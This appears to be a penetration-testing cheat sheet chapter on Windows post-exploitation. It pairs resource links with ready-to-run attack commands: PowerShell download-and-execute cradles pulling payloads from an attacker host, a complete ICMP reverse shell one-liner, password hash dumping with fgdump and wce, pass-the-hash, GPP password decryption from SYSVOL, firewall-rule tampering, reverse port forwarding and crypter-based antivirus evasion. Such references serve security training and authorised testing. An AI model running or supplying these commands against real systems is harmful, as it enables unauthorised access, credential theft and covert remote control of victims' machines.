Chapter 4 - Windows Post-Exploitation
Practice the principle of least privilege. Do not log into a computer with administrator rights unless you must do so to perform specific tasks. Running your computer as an administrator (or as a Power User in Windows) leaves your computer vulnerable to security risks and exploits. Simply visiting an unfamiliar Internet site with these high-privilege accounts can cause extreme damage to your computer, such as reformatting your hard drive, deleting all your files, and creating a new user account with administrative access.”
— Indiana University (Best practices for computer security)
This is the phase I like to refer to as second pass enumeration or enumeration from the inside. Now that we've gained a foothold into the network it is crucial to run all of our enumeration from the ground up as an inside actor.
Resources
Windows Privilege Escalation Fundamentals - FuzzySecurity
Windows PrivEsc Check - GitHub
Windows Exploit Suggester - GitHub
Encyclopaedia Of Windows Privilege Escalation - YouTube
Level Up! Practical Windows Privilege Escalation - YouTube
Windows Privilege Escalation methods for PenTesters
Windows Attacks At is the new Black - YouTube
Analyizing local privilege escalations in win2k
The System Challenge - Decoder's Blog
The Wallstreet of Windows Binaries
Windows Operating System Archaeology
Breaking .NET Through Serialization
Windows Kernel Exploits - GitHub
Cross Compiling from Kali
Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
Transpile Python into EXE
Kali> python pyinstaller.py --onefile file.py
Uploading Files
Kali> cp /usr/share/windows-binaries/nc.exe
Kali> upx -9 nc.exe
Kali> wine exe2bat.exe nc.exe nc.txt
Security Stuff
Exploitation Techniques and Mitigations on Windows
Authentication Registry Keys - MSDN
Demystifying AppContainers in Windows 8 Part 1
Protected Processes in Windows
Intercepting System Calls on x86_64 Windows
Introduction to Windows Kernel Security
Windows Program Automatic Startup Locations
Demystifying the Windows Firewall
Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack
Bypassing Firewalls with Port 23
Pass the hash is dead long live LocalAccountTokenFilterPolicy
Getting Windows to play with itself: A PenTester's guide to Windows API abuse
AZURE
Compromise as a Service: our pleAZURE
Powershell Foo
Resources
Attacking ADFS Endpoints with PowerShell
PowerShell Secrets and Tactics
An Intro to PowerShell and how to use it for Evil
Offensive Active Directory with PowerShell
Low-Level Windows API Access From PowerShell - FuzzySecurity
Upgrade Shell
C:\> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.1/file.txt')"
wget
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://$ATTACKER/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
C:\> powershell.exe -ExecutionPolicy Bypass ‐NoLogo ‐NonInteractive ‐NoProfile ‐File wget.ps1
Execute ps1
C:\> powershell -exec bypass -windowstyle hidden -nop -file c:\path\to\file.ps1
Stream contents of file
C:\> Get-Item /path/to/file.zip -Stream *
Get permissions of directory/file
C:\> Get-ACL C:\path\to\file\or\directory
Packet testing
# TCP
# Setup TCP Listener ie: netcat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.TcpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie")$client.Send($packet, $packet.Length);$client.Close();'
# UDP
# Setup UDP Listener ie: socat
C:\> powershell -Command '$client = New-Object System.Net.Sockets.UdpClient;$client.Connect( "10.10.14.42", 8000 );[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send($packet, $packet.Length);$client.Close();'
# ICMP
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET
C:\> powershell -Command '$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $True;$packet = [Text.Encoding]::ASCII.GetBytes("pie");$client.Send("10.10.14.42", 500, $packet, $options);'
Reverse ICMP shell
Kali> sudo bash -c "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all"
Kali> sudo python icmpsh_m.py $ATTACKER $TARGET
C:\> powershell -nop -Command "$IP = '10.10.14.42';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"
Services
Windows Privilege Escalation via weak Service Permissions
The Art of Becoming TrustedInstaller
LDAP
5 Ways to find Systems running domain admin processes
PenTesting Active Directory Environments: CrapMapExec
Active Directory Privilege Relationships: BloodHound
Active Directory Architecture - MSDN
A Week of Evading Microsoft ATA Day 1
Dumping a domains worth of passwords with mimikatz part 2
Attack Methods for gaining Domain Admin
Find AD users with empty passwords
Domain Trusts and why you should care
A PenTester's guide to group scoping
How to own any Windows network with group policy hijacking attacks
Kerberos
Kerberos Golden Ticket Protection
How to pass the ticket through SSH tunnels
From Pass the Hash to Pass the Ticket with no pain
Abusing Token Privileges for LPE
Dump Hashes
Dump windows password hashes efficiently part 1
I'll get your credentials... Later! - FuzzySecurity
Grab the Windows Secrets! - Decoder's Blog
C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump
WCE
C:\> wce -w
PSExec
You need to be an admin already it copies an executable to an admin share and registers a service and starts it
Lateral Movement with Invoke-PsExec
UAC
Anatomy of UAC Attacks - FuzzySecurity
WMIC
Insecure File Permissions
Elevating privileges by exploiting weak folder permissions
C:\> icacls example.exe
Insecure SYSVOL
C:\> net use z: \\dc01\SYSVOL
Z:\> dir /s Groups.xml
Z:\> copy
Kali> gpp-decrypt
RDP
DLL Injection
NTLM/v2
Practical guide to NTLM Relaying in 2017 AKA Getting a foothold in under 5 minutes
SMB Relay demystified and NTLMv2 Pwnage with Python
Token Stealing
Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain.
Passing the Hash
Kali> export SMBHASH="HASH"
Kali> pth-winexe -U administrator //$TARGET cmd
runas
Encapsulating SSH Traffic with httptunnel
# Bypass Notify with administrative account
$secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automtion.PSCredential("Administrator", $secpasswd)
$computer = "DEV01"
powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1
# add ruleset for firewall
C:\> netsh advfirewall firewall add rule name ="httptunnel_client" dir=in action=allow program="httptunnel_client.exe enable=yes
C:\> netsh advfirewall firewall add rule name ="3000" dir=in action=allow protocol=TCP localport=3000
C:\> netsh advfirewall firewall add rule name="1080 dir=in action=allow protocol=TCP localport=1080
C:\> netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
C:\> httptunnel_client.exe
# upload /usr/share/windows-binaries/plink.exe then setup port forward
C:\> plink -l root -pw pass -R 3389:127.0.0.1:3389 208.68.234.99 -P 3000
# Bypass Anti-virus
Kali> cp payload.exe newpayload.exe
Kali> cp /usr/share/windows-binaries/Hyperion-1.0.zip .
Kali> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Kali> wine hyperion.exe ../newpayload.exe ../crypted.exe